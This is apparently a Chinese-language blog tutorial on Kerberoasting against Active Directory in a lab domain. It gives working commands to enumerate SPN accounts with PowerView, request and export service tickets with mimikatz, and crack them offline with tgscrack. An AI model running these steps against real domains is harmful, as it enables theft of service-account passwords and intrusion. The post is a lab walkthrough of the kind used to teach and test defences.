Kerberoasting 离线爆破攻击

当域用户请求某个域内服务后,kdc 通常会返回一个加密的 st 服务票据,此 st 服务票据被服务 hash 加密,当我们将使用密码字典派生的多个 hash 值来尝试解密 st 服务票据,如果能够揭秘成功,则说明字典中存在目标服务账号的密码。

Kerberoasting 对比 AS-REP Roasting

  • Kerberoasting 利用后获得服务账户密码,AS-REP Roasting 利用后获得发起请求的域用户的密码。

  • Kerberoasting 使用字典爆破 st 服务票据,AS-REP Roasting 使用字典爆破 Logon Session Key。

  • Kerberoasting 需要攻击者具有请求 st 的凭据(某个域用户即可),AS-REP Roasting 需要攻击者枚举出域中 "不要求 kerberos 预身份验证" 的用户。

环境搭建

为管理员 administrator 注册一个 spn,目的是为了 administrator 映射为某个服务的服务账户。

复制代码
setspn -S MySQL/WIN-0v0GAORDC17:3306/MySQL administrator

漏洞利用

  1. 查询域内注册 spn 的用户。工具:PowerView.ps1 ,项目地址:https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
复制代码
Import-Module .\PowerView.ps1 
Get-NetUser -SPN
  1. 使用某个域用户凭据请求这个 spn 对应服务的 st 服务票据。工具:mimikatz
复制代码
kerberos::ask /target:MySQL/WIN-0v0GAORDC17:3306/MySQL
​
# 这里我用来请求 st 的凭据时 administrator管理员,其实其他域用户凭据也可以,只要能请求到 st 就可以。
  1. 导出请求到的 st 服务票据。工具:mimikatz
复制代码
kerberos::list /export
  1. 使用字典进行离线爆破。工具:tgscrack ,项目地址:https://github.com/leechristensen/tgscrack
复制代码
# 先使用 python 脚本提取出 st 服务票据的加密部分,并导出到 /tmp/myhash.txt 路径下
python2 extractServiceTicketParts.py ticket.kirbi > /tmp/myhash.txt
​
# 再使用 tgscrack.go 进行离线爆破
go run tgscrack.go -hashfile /tmp/myhash.txt -wordlist /tmp/password.txt
相关推荐
jyOverQ几秒前
MySQL 索引为什么能加快查询?B+Tree 到底是什么?
数据库·mysql
云絮.12 分钟前
网络原理 ----TCP
服务器·网络·tcp/ip
天天进步201514 分钟前
Pixelle-Video 源码解析 #17:TTS 语音生成:Edge-TTS、Index-TTS 如何接入?
前端·数据库
鸽芷咕15 分钟前
异构数据同步,凭什么敢说数据不丢?——拆解金仓KFS的全周期一致性校验
数据库
海浪仙人掌16 分钟前
账龄分析的定义是什么?账龄分析有什么作用?
数据库
ACP广源盛1392462567317 分钟前
M6/M5 Pro Mac mini 端侧 AI 落地@ACP#IX6024 PCIe2.0 交换芯片在轻量化 AI 服务中的机会与应用场景
大数据·数据库·人工智能·嵌入式硬件·macos·开源
ly768923 分钟前
深入解析 MySQL 间隙锁:从加锁规则到死锁案例
数据库·mysql·死锁·间隙锁·next-key lock·事务隔离
LRL_24 分钟前
7x24小时不停机:基于 Apache SeaTunnel 实现 Oracle to Oracle 实时 CDC 同步全实战
数据库·oracle·apache
不剪发的Tony老师25 分钟前
Navop:一款工具搞定数据库、SSH、SFTP、远程桌面、AI Agent
运维·数据库·ssh
是隼人25 分钟前
buuctf-pwn pwnable_start(ret2shellcode)题解(学习过程持续更新)
c语言·学习·安全·pwn入门·ctf入门